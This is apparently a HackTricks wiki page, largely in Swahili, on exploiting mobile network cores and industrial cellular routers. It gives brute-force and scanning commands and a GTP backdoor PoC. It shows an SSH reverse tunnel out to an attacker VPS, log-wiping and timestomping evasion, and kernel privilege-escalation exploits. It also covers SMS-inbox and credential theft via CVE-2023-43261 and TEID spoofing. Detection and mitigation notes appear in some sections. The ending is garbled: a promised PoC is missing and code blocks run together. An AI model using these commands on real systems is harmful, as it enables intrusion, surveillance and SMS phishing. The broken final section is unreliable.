Telecom Network Exploitation (GTP / Roaming Environments)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Note

Protokoli za msingi za mtandao wa simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa sababu zinatumia plain UDP na karibu bila authentication, kigezo chochote ndani ya perimeter ya telecom kwa kawaida kinaweza kufikia mifumo ya ishara ya core moja kwa moja. Maelezo yafuatayo yanakusanya ujanja za kushambulia zilizotambuliwa kwa vitendo dhidi ya SGSN/GGSN, PGW/SGW na node nyingine za EPC.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

Seti kubwa kwa kushangaza ya vendor network elements huja zikiwa na watumiaji wa SSH/Telnet walio hard-coded kama root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … Orodha ya maneno maalum inaongeza kwa kiasi kikubwa mafanikio ya brute-force:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

Ikiwa kifaa kinaonyesha management VRF pekee, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).

1.2 Utambuzi wa host ndani ya GRX/IPX

Wahandisi wengi wa GRX bado wanaruhusu ICMP echo kupitia backbone. Changanya masscan na built-in gtpv1 UDP probes ili ramani kwa haraka GTP-C listeners:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Kuorodhesha Abonati – cordscan

Zana ifuatayo ya Go huunda vifurushi vya GTP-C Create PDP Context Request na inarekodi majibu. Kila jibu linafunua SGSN / MME inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Bendera muhimu:

• --imsi IMSI ya mteja lengwa
• --oper Home / HNI (MCC+MNC)
• -w Andika paketi ghafi kwa pcap

Konstanti muhimu ndani ya binary zinaweza kuhaririwa ili kupanua skani:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Code Execution over GTP – GTPDoor

GTPDoor ni huduma ndogo ya ELF ambayo inashikilia UDP 2123 na inachambua kila kifurushi cha GTP-C kinachokuja. Wakati payload inaanza na tag iliyoshirikiwa kabla, yaliyobaki yanafumbuliwa (AES-128-CBC) na kutekelezwa kupitia /bin/sh -c. stdout/stderr hutolewa nje ndani ya ujumbe za Echo Response ili hakuna kikao cha nje kitakachoundwa.

Kifurushi kidogo cha PoC (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Utambuzi:

• host yoyote inayotuma unbalanced Echo Requests kwa SGSN IPs
• bendera ya GTP version imewekwa 1 wakati message type = 1 (Echo) – utofauti na spec

4. Pivoting Kupitia Kiini

4.1 sgsnemu + SOCKS5

OsmoGGSN inatoa emulator ya SGSN inayoweza kuanzisha PDP context kuelekea GGSN/PGW halisi. Mara tu ikikubaliwa, Linux hupokea kiolesura kipya tun0 kinachofikika kutoka kwa roaming peer.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

Kwa firewall hair-pinning sahihi, tuneli hii inapita kando ya signalling-only VLANs na inakupeleka moja kwa moja katika data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS karibu kila wakati iko wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwa VPS yako ikisikiliza kwenye :53 kisha rudi baadaye kutoka nyumbani:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Hakikisha kwamba GatewayPorts yes imewezeshwa kwenye VPS.

5. Njia za Siri

Implants zote zina watchdogs zinazofanya timestomp binaries zao na kuanzisha upya ikiwa zitacrash.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation kwenye NE ya zamani

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Kidokezo cha kusafisha:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Zana

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in previous sections.
• FScan : matambazi ya TCP ya intranet (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS rogue WPAD
• Microsocks + ProxyChains : lightweight SOCKS5 pivoting
• FRP (≥0.37) : NAT traversal / asset bridging

9. Shambulio za Usajili za 5G NAS: SUCI leaks, kuangusha hadi EEA0/EIA0, and NAS replay

The 5G registration procedure runs over NAS (Non-Access Stratum) on top of NGAP. Until NAS security is activated by Security Mode Command/Complete, initial messages are unauthenticated and unencrypted. This pre-security window enables multiple attack paths when you can observe or tamper with N2 traffic (e.g., on-path inside the core, rogue gNB, or testbed).

Registration flow (simplified):

• Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
• Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
• Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
• PDU Session Establishment: IP/QoS setup.

Lab setup tips (non-RF):

• Core: Open5GS default deployment is sufficient to reproduce flows.
• UE: simulator or test UE; decode using Wireshark.
• Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
• Useful display filters in Wireshark:
• ngap.procedure_code == 15 (InitialUEMessage)
• nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)

9.1 Usiri wa kitambulisho: Makosa ya SUCI yanayofichua SUPI/IMSI

Inavyotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa public key ya home-network). Kupata SUPI/IMSI isiyo ya kusimbwa ndani ya Registration Request kunaonyesha kasoro ya privacy inayowezesha kufuatilia mteja kwa muda mrefu.

Jinsi ya kujaribu:

• Rekodi ujumbe wa kwanza wa NAS ndani ya InitialUEMessage na inspekte Mobile Identity IE.
• Ukaguzi wa haraka wa Wireshark:
• Inapaswa ku-decoder kama SUCI, sio IMSI.
• Mfano wa filter: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci inapaswa kuwepo; ukosefu wake pamoja na kuwepo kwa imsi inaonyesha leak.

Vitu vya kukusanya:

• MCC/MNC/MSIN ikiwa vimefunuliwa; rekodi per-UE na fuatilia kwa muda/maeneo.

Uzuiaji:

• Leta sera zinazolazimisha SUCI tu kwa UEs/USIMs; toa alama ya onyo kwenye kila IMSI/SUPI inayotokea katika initial NAS.

9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Mandharinyuma:

• UE inatangaza EEA (encryption) na EIA (integrity) zinazoungwa mkono kwenye UE Security Capability IE ya Registration Request.
• Mipangilio ya kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algorithimu tupu.

Tatizo:

• Kwa sababu Registration Request haijalindwa kwa integrity, mshambuliaji aliye kwenye njia anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks hujikubali vibaya algorithimu tupu nje ya huduma za dharura.

Hatua za kushambulia:

• Intercept InitialUEMessage na badilisha NAS UE Security Capability ili itangaze EEA0/EIA0 pekee.
• Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
• Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.

Uthibitisho/uwazi:

• Katika Wireshark, thibitisha algorithimu zilizochaguliwa baada ya Security Mode Command/Complete.
• Mfano wa output ya sniffer passive:

Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Mikakati ya kupunguza (lazima):

• Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapohitajika kabisa (mf., miito ya dharura).
• Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; andika log na itisha alarm kwa muktadha wowote wa usalama wa NAS unaojadili null algorithms.

9.3 Replay of initial Registration Request (pre-security NAS)

Kwa sababu NAS ya awali haina uadilifu (integrity) na freshness, InitialUEMessage+Registration Request zilizokamatwa zinaweza kurudishwa (replayed) kwa AMF.

PoC rule for 5GReplay to forward matching replays:

<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to observe:

• Je, AMF inakubali replay na kuendelea kwenye Uthibitisho; ukosefu wa uhakiki wa muda/muktadha unaonyesha uwezekano wa kufichuliwa.

Mitigations:

• Lazimisha replay protection/context binding katika AMF; rate-limit na correlate per-GNB/UE.

9.4 Tooling pointers (reproducible)

• Open5GS: spin up an AMF/SMF/UPF to emulate core; angalia N2 (NGAP) and NAS.
• Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
• 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
• Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.

9.5 Defensive checklist

• Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
• Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
• Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
• Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.

10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Kutumia vibaya web APIs zilizo wazi za router za cellular za viwandani kunaruhusu smishing ya asili ya carrier kwa kiasi kikubwa na kwa utulivu. Milesight UR-series routers expose a JSON-RPC–style endpoint at /cgi. Wakati imepangwa vibaya, API inaweza kuulizwa bila authentication ili kuorodhesha SMS inbox/outbox na, katika baadhi ya deployments, kutuma SMS.

Typical unauthenticated requests (same structure for inbox/outbox):

POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }

{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Majibu yanajumuisha mashamba kama timestamp, content, phone_number (E.164), na status (success or failed). Kutuma failed mara kwa mara kwa namba ile ile mara nyingi ni “capability checks” za mshambuliaji ili kuthibitisha kuwa router/SIM inaweza kuwasilisha kabla ya blasting.

Mfano wa curl ku-exfiltrate SMS metadata:

curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Maelezo kuhusu auth artifacts:

• Baadhi ya trafiki inaweza kujumuisha auth cookie, lakini sehemu kubwa ya vifaa vilivyo wazi hujibu bila authentication yoyote kwa query_inbox/query_outbox wakati management interface inakabiliwa na Internet.
• Katika mazingira yanayohitaji auth, previously-leaked credentials (angalia chini) hurejesha ufikiaji.

Njia ya urejeshaji wa credentials – CVE-2023-43261:

• Familia zilizoathirika: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
• Tatizo: web-served logs (mf. httpd.log) zinaweza kufikiwa bila authentication chini ya /lang/log/ na zina admin login events zenye password iliyosimbwa kwa kutumia hardcoded AES key/IV iliyomo katika client-side JavaScript.
• Ufikiaji wa vitendo na decrypt:

curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Mfano mdogo wa Python wa ku-decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Mawazo ya ufuatiliaji na utambuzi (mtandao):

• Alert on unauthenticated POST /cgi whose JSON body contains base/function set to query_inbox or query_outbox.
• Fuatilia vurugu za POST /cgi zinazojirudia zikipitisha entries za status":"failed" kwenye nambari nyingi za kipekee kutoka kwa IP moja ya chanzo (mtihani wa uwezo).
• Fanya inventory ya Milesight routers zilizo wazi kwa Internet; zuia usimamizi kwa VPN; zima vipengele vya SMS isipokuwa vinahitajika; upgrade to ≥ v35.3.0.7; badilisha credentials na pitia SMS logs kwa ajili ya sends zisizojulikana.

Shodan/OSINT pivots (mifano iliyopatikana katika mazingira ya kweli):

• http.html:"rt_title" matches Milesight router panels.
• Google dorking kwa ajili ya exposed logs: "/lang/log/system" ext:log.

Athari za kiutendaji: kutumia SIMs halali za carrier ndani ya routers kunatoa deliverability/credibility ya juu sana ya SMS kwa ajili ya phishing, wakati inbox/outbox exposure leaks sensitive metadata kwa kiwango kikubwa.

11. PFCP Session Hijack & GTP-U TEID Abuse

11.1 PFCP Session Modification to steal flows

If you can speak PFCP on N4 (e.g., from a mis-filtered GRX/IPX segment), craft a Session Modification Request that inserts a duplicate PDR ID but with a smaller Precedence and a FAR pointing to your host. Some UPFs (e.g., OAI-cn5g) apply the first matching PDR and never check for uniqueness, so the malicious PDR hijacks all subsequent packets of that PDU session to your sink.

Minimal Scapy PoC (assumes PFCP contrib is available and you know SEID/PDR IDs):

</details>

### 11.2 Kuingiza trafiki ya mtumiaji kwa spoofing TEIDs
Ikiwa uplink GTP-U kutoka backbone haija-ACL’d, unaweza replay/guess **TEIDs** zinazojulikana kwenye vichwa vya GTP-U na encapsulate IP/TCP yoyote kuelekea peer wa UE au Internet. Mfano craft:
```python
send(IP(dst="10.10.20.8")/UDP(dport=2152,sport=2152)/
GTP_U_Header(teid=0x7ffed00)/
IP(src="10.0.0.10",dst="1.1.1.1")/TCP(dport=443,flags="S"))

# Swap :authority to the victim NF and reuse the bearer token
curl -sk -H "Authorization: Bearer $TOKEN" \
-H "Host: smf.internal" \
https://smf.internal/nsmf-pdusession/v1/sm-contexts

python3 fivgeefuzz.py --nf nsmf-pdusession \
--target https://smf.internal \
--grammar grammars/nsmf-pdusession.json \
--token "$TOKEN" --threads 8 --max-cases 500